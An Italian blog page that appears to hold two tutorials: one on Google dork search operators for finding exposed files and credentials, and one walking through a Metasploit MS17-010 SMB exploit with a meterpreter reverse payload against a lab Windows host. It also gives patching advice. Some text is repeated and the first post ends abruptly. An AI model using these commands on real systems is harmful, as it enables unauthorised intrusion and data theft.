Google Dorks e hacking
Cari lettori oggi parleremo di Google Dorks, un potente strumento alla portata di tutti che può rivelarsi veramente molto molto utile!
Spesso si sente parlare delle Google Dorks utilizzate dai criminali informatici, ovviamente l’utilizzo delle Google Dorks non è solo per scopi illegali ma può essere utilizzato per effettuare ricerche mirate su qualsiasi argomento.
Il campo di applicazione delle dorks è veramente ampio infatti attraverso questo strumento potremo individuare in pochissimo tempo determinati file nel web come pdf,mp3 e così via, oppure addirittura pagine web particolari che contengono login e password degli utenti un determinato servizio.
Google Dorks List "Google Hacking" è utilizzato per estrarre informazioni sensibili da Google, semplicemente utilizzando termini di ricerca avanzati aiutano gli utenti a trovare ad esempio l'indice di un sito Web specifico oppure un tipo di file specifico ed addirittura alcune informazioni interessanti da siti Web non protetti.
Utilizzando la lista delle principali Google Dorks 2021, (scaricabile a questo link:
https://cybersguards.com/google-dorks-list-latest-sql-dorks-list-fresh-update ), possiamo scoprire informazioni incredibili , indirizzi e relativi elenchi di posta elettronica, file sensibili, credenziali di accesso, informazioni finanziarie come ad esempio i dati delle carte di pagamento.
Partendo dal presupposto che alcuni sysadmin potrebbero non aver applicato alcune regole importanti, è possibile cercare alcuni file riservati e/o confidenziali, non destinati al grande pubblico di Internet.
Un’attenta query infatti cerca per messaggi di errori, file di configurazione o altro che potrebbero in qualche modo esporre all’esterno versione del software o altro ancora, informazioni importanti per un attaccante. Le Google Dorks sono veramente basilari sintatticamente, seguono tutte:
nomedork : parametro
Come abbiamo potuto vedere le Google Dork possono aiutarci tantissimo per le nostre ricerche giornaliere, senza effettuare molteplici ricerche per raggiungere l’obbiettivo, infatti con una query mirata possiamo recuperare diverse informazioni.
Entriamo nel dettaglio del nostro test e facciamo qualche prova, apriamo il browser , andiamo su google per digitare una specifica dork.
Come abbiamo potuto vedere le Google Dork possono aiutarci tantissimo per le nostre ricerche giornaliere, senza effettuare molteplici ricerche per raggiungere l’obbiettivo, infatti con una query mirata possiamo recuperare diverse informazioni.
Entriamo nel dettaglio del nostro test e facciamo qualche prova, apriamo il browser , andiamo su google per digitare una specifica dork.
Supponiamo di voler trovare tutte le guide pdf possibili sul linguaggio di programmazione python, scriviamo sul motore di ricerca guida python filetype:pdf e come per magia otteniamo diverse pagine tutte contenenti file pdf. Questa query ci ha permesso di risparmiare tantissimo tempo, altrimenti avremmo dovuto girare tra le pagine per trovare i vari pdf.
In questo esempio abbiamo utilizzato la dork filetype:tipofile che serve a selezionare solo quelle pagine web che contengono al loro interno file dell’estensione indicata subito dopo i due punti.
Con le dorks potremo fare di tutto, come ad esempio limitare la ricerca solo ai siti che contengono determinate parole. Se volessimo limitare la ricerca alle pagine che contengono una determinata frase, basterà scrivere nel campo di ricerca allintext:testo da ricercare.
Le Google Dorks ovviamente possono essere anche integrate all’interno del nostro caro amico Kali Linux 😊
Fino qui diciamo che l’utilizzo che abbiamo fatto delle Google Dorks nel nostro test è stato fatto per scopi privati su ricerche che potenzialmente facciamo tutti i giorni.
Le Google dorks essendo così potenti sono però ovviamente utilizzate anche dai pirati informatici per fare hacking, di solito viene utilizzato nella fase iniziale per la raccolta delle informazioni.
Come detto in precedenza, gli operatori avanzati nel motore di ricerca di Google vengono utilizzati dai malintenzionati per individuare stringhe di testo specifiche all'interno dei risultati di ricerca.
Ad esempio per trovare siti Web vulnerabili
Metasploit
Cari lettori , oggi parleremo del Framework Metasploit (Il Metasploit Project è un progetto di sicurezza informatica che fornisce informazioni sulle vulnerabilità, semplifica le operazioni di penetration testing e aiuta nello sviluppo di sistemi di rilevamento di intrusioni).
In questo articolo andremo a vedere il suo funzionamento e la sua potenza facendo un test reale, partiamo subito con il nostro test utilizzando come sempre il nostro caro amico Kali Linux 😊
Come prima cosa facciamo una scansione della rete per vedere quali device , computer ci sono collegati, nel mio caso il computer con sistema operativo Windows 10 da testare ha un indirizzo ip 192.168.0.186
Adesso dobbiamo fare una scansione dell’ host da testare per vedere lo status, ovviamente lo facciamo con nmap, apriamo una shell e scriviamo il seguente comando:
sudo nmap 192.168.0.186
Questa macchina non risponde ai ping che vengono inviati, no problem aggiungiamo l’opzione -Pn
sudo nmap 192.168.0.186 -Pn (-Pn effettua la scansione senza il ping)
Questo sarà il risultato dopo la scansione dell’ host con nmap.
Adesso dobbiamo vedere la versione dei servizi attivi scrivendo il seguente comando:
sudo nmap 192.168.0.186 -Pn -sV (-sV Controlla la versione del servizio attivo)
Adesso facciamo partire il Framework Metasploit, apriamo una shell e scriviamo:
sudo msfconsole
Facciamo la seguente ricerca
grep scanner search smb
Questo sarà il risultato
Per il nostro test utilizziamo il nuomero 41
use auxiliary/scanner/smb/impacket/wmiexec
Con il comando show options potremo vedere le info che servono.
Come prima cosa controlliamo se il nostro host è vulnerabile scrivendo:
set RHOSTS 192.168.0.186
run
Bingo è vulnerabile:
Adesso dobbiamo cercare l’exploit adatto, scriviamo il seguente comando:
grep exploit search smb
Per il nostro test prenderemo il numero 39, scriviamo il comando:
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.0.186
set payload windows/meterpreter/reverse_http
Scriviamo show options per vedere se servono altre info:
Lanciamo l’exploit:
exploit
Adesso scriviamo il comando:
sysinfo
Come difendersi?
Come sempre se questo host fosse stato aggiornato con le patch di Windows non avrei potuto violarlo, per questo è molto importante effettuare tutti gli aggiornamenti proposti da Windows, avere un buon antivirus e tenerlo ovviamente sempre aggiornato.
Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.
Al prossimo articolo 😊
N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.
Giorgio Perego
IT Manager